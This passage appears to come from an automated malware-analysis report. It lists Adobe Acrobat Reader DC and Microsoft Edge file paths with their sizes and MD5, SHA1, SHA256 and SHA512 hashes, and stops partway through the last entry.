                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  5213e7736a75f5d1e753e2c654c0e682b180427b

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  01d63cac397760760c7251a7dc5abe25258204ca1bc1cf4cd8a0bc2a5abf6da2

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  4113f32f2a795e06fbc2a026f3b84c6d5d2681dcd5208df45cc7ac7e698843e9260ea69f924d5a8c6d38dd27c9a60c9166cb9c7d4251e7caf01855dd736bd55c

                                                                                                                                                                                                                                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\images\faf_icons.png

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  6KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  5ca8bf5c7cd293a065f019ee2bfadc35

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  d6ac4649dd82007b3cb55d6b9e7e449f2e657e48

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  e52a2cf3967632e989e9aecb0e9b8cd1171e909979a4651cfbf6eb80e4e90459

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  da96bcbf290e9fd37ae7055ea958059cac81c87e66cd1d8d5dcb95e817fa5634fd28d8ff6b331096fb517497d07a42f5ea04dfa3dd7028c2f9b6d5aca602d6bd

                                                                                                                                                                                                                                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\images\themes\dark\progress.gif

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  19KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  7931717e110bf1be63d03bf0c05e5f7d

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  7d85ae0cded322d9cf1b4af62537992a801b6ed8

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  c37818583bc4256e162226ac6a7cad681f5f792ecf246b8aafec582326ca4e54

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  5d32f370ffd13172b6b20f2b82f0e102a818888a43f06ddfc00e09a51cff8af69f087791439a57700243b328936c03487711357ae08abdfb1aae748278e3b0f7

                                                                                                                                                                                                                                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\root\ui-strings.js

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  8KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  6602015c144da5745314efad15faa832

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  94cc4870b1ece495ff7a2caf830631ae38ac660e

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  ac65807cbf9fa7237a2d652f61216abc93b568c903a3d59ed9baf2faf9bf8bfe

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  a74852778357819765bf43abd0ce5c272611ffbb199ddec91227f5f92a51006f8746dd8212c53d0c9eec673b0eec45b97894bd3b74524fe9d0bb022cd6dd6fbf

                                                                                                                                                                                                                                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\sl-sl\ui-strings.js

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  a2fe3497df2a434167f7a443adb5edae

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  7ceda40f919a30eb440fac533fb3c727767bc92f

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  ee70780380a48599a5774a2051093a6de0fcfdeb4a8d184e3f49ed3e02468ecc

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  9ff7d86e32438bfe28eaa75a3da779bd7758a6b49cdec8d54f16f60487ac97649248b5204a9762c7fc0a69dceb3a53058980df63b62567e18a47b7152a86cb0e

                                                                                                                                                                                                                                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\root\ui-strings.js

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  1KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  47cbb0108bd015595620ca9e8c6d42c8

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  6e0d938a10d763c71ec1eb9a79693cd3d1c185bd

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  b20176b1be9d3e2764bca20aa4a5a5a236ba64d46a0cb3bcb02c6dfc8af7e4be

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  093fc7bd1b4448d31544de8d90d15571d31202d5dea259d3bd1410d8f5994d78156550821740c11a823ed844f93880b000790ee3657bdd487b6d1c3e323fca77

                                                                                                                                                                                                                                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\themes\dark\bun.png

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  3KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  1bed8c056ff56a3df86636737f54c949

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  ed67315cc04931c2f06f1d84667f4c6c6f7f335e

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  a1d018be485cfbda51ed4734b853d7eae44716c4e94b88f633560afb7d8ccb77

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  15bc7a70db96fb6c2292774c20a653ae33fb0d99aad3882b1bb207618ddd07fd69a26180640872a77d850aff5f7cd784fcb0a852d503a5e139ceecf7af6c1215

                                                                                                                                                                                                                                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\themes\dark\cstm_brand_preview.png

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  2KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  aabb0d1c1ee568a40304e9a82b4c9077

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  da95c6b275d4f875cd4a0c97c8c6386220d1febf

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  c32edf6dbee4bd9090308145905efbe2fa1fb6474455f76a90ed11b8dd1e86a3

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  84ea38c6913ab464d3e282c857187235f2c1629b81496b744a348c8e8a9f90163dd74a2e23e93e55520fc7d93c60ecbcef8a01a85e1070d00cedf2e0ae005de6

                                                                                                                                                                                                                                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\themes\dark\cstm_brand_preview2x.png

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  5KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  148aead2f6a87ef4c10019cf11ee3245

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  d00faee7ed7c71d714974ac4467ee1b6b3c44b96

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  97b25b40a0cebf51b46bc13c6af86a0c1ef8a443535dde63042e1eec286089c8

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  673c8ca9741b7511fc818fd12ea31ffe737bf551082d631a55584d059b87931ddc5c4dcb70dd63049aff6f3f4c3a67be25634e49f5b6ba6e33266c7c09f44af5

                                                                                                                                                                                                                                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\themes\dark\dd_arrow_small.png

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  810B

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  ced2811c7b6543be20f0afb4acd304d1

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  33254cd2572757643af2d92c9ebfc21475258e51

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  a430e19aa05bcaf64aea315d20b64469f775e01054aa149657a4356bf8372cd7

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  98cd5af41ec528039925ae3e51db1585ca147f95eadf3f95aa2db5810284c9b49a1ace52e9b091d72f70bb99f162d8f528484b2550dda8336a69e728a43e829a

                                                                                                                                                                                                                                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\themes\dark\dd_arrow_small2x.png

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  906B

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  005dedee108c9c66c014450539e05ec9

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  a4134dc5e8d9b03abaacf769cd29c6ae7dbc1136

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  9d3d34f545e422785b4b1b7ebd3748a81188260efb373ae332d885d9faecc789

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  abc7f46571c8fa4a18d6912f21cbdddc279177e5010ae87c5ce2b6f9ceb577a3d59b091ac9b58b258c06e6e2bf58905892e66e70415a213e51e0f83108d24d77

                                                                                                                                                                                                                                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\themes\dark\illustrations.png

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  91e346cbe30f771a1cc1d3042fb89428

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  71a7ed2dfe7798d984cf49b6d0f71dceaa234070

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  7f4504454dfbb2638b1f3c5c380be1c23eeb5b6201ff26298f79ee6f3ee8f9fe

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  db80a8c9a33da99d29e822b6f2fe2bacd1747caadb61f06d51e5764740919e2262c4674eee1af86ba8c583a55dd5a2b797858d19918c9ddaf7b82c56366d6665

                                                                                                                                                                                                                                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\themes\dark\nub.png

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  1KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  fac9c42a397648eda6ebb21ffedaa1a8

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  c99a9d74afc77ac1820f933ffc362f3a7bf6b9c2

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  893495dc65a558893da5712dfeadba99b9ac1e5764d0f6b9a1688263be4a6126

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  569297470b24ad7ffab43266214662b44bb2708fffc5f122aa09802e5679d2e28042fc7942ea29b2b058ee4893472da450c21f29628dc553eb146d560ac9c53b

                                                                                                                                                                                                                                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\themes\dark\s_filter_18.svg

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  1KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  94c987a7570cf649f8375374cf9c6bba

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  042f85e38e5badfad92ac97cfd9261b033c868da

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  e0f13c3c244793151f3866a0d11466bd93d56cc8b2438b06ad3b181934796eb7

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  9648044ec0764c62f095d1daaef622a0e6fc389b3c463368328dc77e111edc5c3906429d778d3e5b31029d412328b30f0a4e5f41ab5e14f30441771931079485

                                                                                                                                                                                                                                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\themes\dark\s_listview_18.svg

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  2KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  b2a123d8a411d08148fef81a95f1f98b

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  2745beff44207712e30ad78bbde835835913e42e

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  588c2551bc33f51203664a8020ba42a3aab140e5cb68502ab5c8c922ccd06826

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  6e16a6b96b95dbd9817a93c3a3458b0bf0193a89cf5ba8d0535edec315f846a20047f411c834ff8ebba99d2a55eed562ec1091e7024c0ce6e777057119bd3529

                                                                                                                                                                                                                                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\themes\dark\s_opencarat_18.svg

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  1KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  0b3d24b1fd660693ed19a033ca5d95a8

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  51ce14946184db95828249800f575bb2f8c6bebb

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  110d16e6788d5ee8faafaffa4f78299df80e959fdb016e26e88138968a1074f7

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  e26110f3eba26ed70967ff76dd9be282eaed8f5c0297badcd78e6bbbc52ae3f47c8ca3bba49901a064c0bc908898cdc22ea874ad735f174c46b50c36784f261f

                                                                                                                                                                                                                                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\themes\dark\s_thumbnailview_18.svg

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  1KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  ec7ac64317bf1599624aacd6934dae3e

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  ad302281c50496a92b330eb2280527295ad16da6

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  f24d1cef23b726a20ebd7ff7a8546fceece1f023fbf111c1d856924f09c4bb5d

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  b85429aeec44222b09922fda753a4924b7e9f6eb8ada71b53b7df3db650adaa08ea661ad73415da2cdd51da7aea4d1d916d92102bd4f1576749ae649aa5a6e7a

                                                                                                                                                                                                                                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\themes\dark\share_icons.png

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  1KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  5aa7105003b4c0ed2e020447eb6281bf

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  9569cc199c6b7a7a74d44895802d651f23f8b6c4

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  f44891505a087d294329b2b386cf3b877b460aaacc3b4734b73eaf0ae746e30d

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  08e181c1c67739e367a95b9c931082d5c1b935728b91ddd69af223d4857efd4670624a3b9518c74c25e2d8801ef1d9155e82d4f5f8b8d06f1a19fb9bda4739ff

                                                                                                                                                                                                                                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\themes\dark\share_icons2x.png

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  3KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  8ce6f1636becc27837d72c4d2b342d02

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  82f25a26ac165a74ea3cb3b0e839030e5f7ca10f

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  fc57fcaf4c56a8d634b5f2fe89c5ba6b6c2b678c5e93b6ba0c211ecc0e89829f

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  93cec3c6624d4ed34540fd04854737123badd64bee68774d7605364938d59e006f3b2195f02aec1ff4230d1ce1ed51b6ff2d1a5b18e8d1b5879dcb20578a8186

                                                                                                                                                                                                                                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\root\ui-strings.js

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  14KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  2b11de4de9e5350f1d796775d1cc2854

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  bb1a743fa4170d4ff5641b2091a157b48bb294c4

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  1b0157e152bdb67515b38e1d3f94b9d7d7763c6b9f0e42b142958577b68e3af5

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  208e61fa82474d457474f401eb210e172b9f152a4442b3a308495564c2a0cb7345e60e6e3d283b129d993ca237ba11220c6bca6a2bcfdc396d0ae3c76683a4c5

                                                                                                                                                                                                                                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\adobe_spinner.gif

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  1KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  4f243c9acca20a25f77e527535a36ef7

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  27c798cacff48293d9e107639bd6786a0dcf854c

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  11054d0f524fc538830b6d84713ae6eead2ba9363ce8d1b35044c3ae724bcab1

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  0a7fe8a25af8be7c8040c03a95a81ca192805a7fd80634297698b8a7cb1de9bec6cac90a36ffa6b46c84c294a4ee3bb957b88c922905afc1d622a926aa97c0f7

                                                                                                                                                                                                                                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\themes\dark\adc_logo.png

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  966be8467b0c9958135474d195ed4898

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  679267fba2badb9352cec6b4a593a01d574bc048

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  b6b7f0effc65c4f5971abafe84df08849d96071f9968089e938e9098bf5470fc

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  4466a0cacff4e238a766cca779d6dedaca60a2ca91fa1c12d01998b45be49ef761b77addf72eaa59fbad0d8a3a7e2b46d25704500231bd320826c701437c23ab

                                                                                                                                                                                                                                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\themes\dark\logo_retina.png

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  7KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  7f418d678eeafb4d3f3b19bc95f7085b

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  90241e352b5cf55245f2e97cddd96c600ba56bf0

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  367e30501f25e82667747cd15384f86ec37b9bd3ee56bc6704f1eb3c51a69060

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  db6a3d8ed1558c63f9957f33d064418c19e445ed83967e374e98a46cf5ecf88445ca0f8e170edfd706bb1a75cf552d55ab35e82018d15d34f77ea09b7a482235

                                                                                                                                                                                                                                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\themes\dark\sat_logo.png

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  1KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  4b3431e346988c2e1b7cbea2995e7696

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  b990f54a7b8cfeeb72feca617fdf6e91afeaf059

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  18120707fe67145f1650ce43f3089d2f130547ab308515903b0ae2bdc9f37889

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  f81e1654a9f7f900b9414fdf4050438fa65cf00b71ec279ad927afc2a01fbd8e60190e3023b59b2fbdd39bfcf7fa1b844fb4e50c46473e752926a594a0e2832e

                                                                                                                                                                                                                                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\themes\dark\sat_logo_2x.png

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  2KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  16b58d6bc4b19613e7eaa773642391f7

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  3aea7cb27b5c4ca929a92ea39600986b009dc0c1

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  88cae66af4ae2d0702bb388f34ef4fdd7c21b486ba4ae10fd459d36038c1529c

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  b507e9cdc9cddf3d0aade8c8e9fe1390f89451662daba93af72db53bb719942a3d2ac4183f108bc9d338b888d5638bd4b94b2d1d49d7b318a792b72dc278d1fc

                                                                                                                                                                                                                                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\en-gb\ui-strings.js

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  10KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  9d29666615c24331aaddb3ef8edbfece

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  f267e68f2a7880137ff386d04da56c7ff4c51635

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  9fd27b64f51a157ae048c02917011a378c95661c8206c894d34f2afd45e52fde

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  604fbd9fc09873fd9df98755ae76683ba2775c67dab28195156e1b892b44bd6b50d85ec1a1f2aabf31c427c0881e6ccf2970251b1beeac498dbec31d718e1098

                                                                                                                                                                                                                                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\root\ui-strings.js

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  14KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  b403a3e1f57c843023dabfe36a9ad8f4

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  11555886d0dd5bb3bc9ccd654a26d0f2e2f96b5d

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  4387f8ccd246a42355164d447a769f4d99273606975b736151b11caf1803bef8

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  a15ad6d679b1eeb18fe5e399918a79c4cade4352dd11cfc290c0489acb83590814a69c4de6787c9fcadde37cc6c4edd3bb0cb53c69b2bf85c2e859ad8912adb3

                                                                                                                                                                                                                                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\es-es\ui-strings.js

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  1KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  3db1f2bb47b6323a4b276ed9e1d7564c

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  d2e3f599e3645b66a7e6e8873bc6eaaca5da96f0

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  02f8efa18d58696cf4f4f04f1f4e16af61e217c9ef5d949c6f1b49c6e23dcd07

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  b0c3c8fd2dd9c2a155a20d65d5c7553b59d60ce9de1fafabc5a1ff8d61c37e799061e6b21158c7c11fc7f64f7beb59dd3c8f899b434e29508f15d05370a3b49c

                                                                                                                                                                                                                                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\root\ui-strings.js

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  18KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  22e575dfb5710a991facbc01788fd8f9

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  ba687e6fe39bbee9036357e34ea00d799d8326e4

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  cfe2eb0fef65ef0188249b821d158b935c5bb86fe7b465877d1cdeef012fe3e3

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  2e441b08d6500b8f3701c8d8466b86e2915840a64f31973487faec381716f002879dd91bd3314c0ba3951e7e114db6b2e15e0acc22061ed07b05af8bed067e2c

                                                                                                                                                                                                                                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\ui-strings.js

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  1KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  c2bf06735a650700b8be125cd9a5271c

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  6fdaa4b247f2721ebd4809aef0e4ddaab21b5dca

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  8b7b19b262581ddee8e986acd68ec485a5f22c253db33d3e762fb2d479c661cf

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  a824e28c46906a3d152107a98c86c80fdabca0b751ed1df3ef14e7bbf9b8adbed90230db38e4ae332e5e8418ec64662e6e27b11105f2651ef590c63d92cdd33c

                                                                                                                                                                                                                                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\he-il\ui-strings.js

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  1KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  0bec5ad3bee27b2fa9cbf9b2f6e2705a

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  3e525bd6fbc587718c9813f9b1e7838a4ae451eb

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  2c3ea06385b134d55421dc771c09953fca67fc474bf4500ed47847b4fcc0604b

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  3253a8dbd0e484a1876b5e5896489390b32f5324f2ff37bfc10e1ba83a3dc718d6d884fac4003ecaa976c4e0066ed84bc662fcf01a556351911c3c38bfef0896

                                                                                                                                                                                                                                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\root\ui-strings.js

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  2KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  25d0262a6e2a83a4deb70f834b3d9cab

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  684ec1ae624da99bec02b0f2c7e079d93cd1bf93

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  2c35b882e964a56bf87d3bbbc656f3cb9a6c117aec01b29a9bc009bb6a415af4

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  f6a8e7fca23a8144ca4323e5a6c5655b6de09332637e71de77fa168ccf1e7db6af81faf079963b6a589723bdc773607c1e8a48a62779b0fd04e3f39ddcd27f59

                                                                                                                                                                                                                                                • C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB_EURO.txt

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  33KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  69d63e1cca9b415fcc2e09d7b6e549f8

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  54d93916965d5c7fe96421032b789196210ffee6

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  fbab3656360b5afb9d10920f0544889eea3fb2568653c6983f7bd2906cf1bd41

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  09ce8c3398a232b98728704bbd9fb423a3a661bd3f4f6cdbdfc428f1c3160b43753d845e4bd98f4509ffa34609428b06e33fbc08965b8ac88e73ef443b2f5ec9

                                                                                                                                                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\identity_proxy\identity_helper.Sparse.Internal.msix.DATA

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  55KB

                                                                                                                                                                                                                                                  MD5

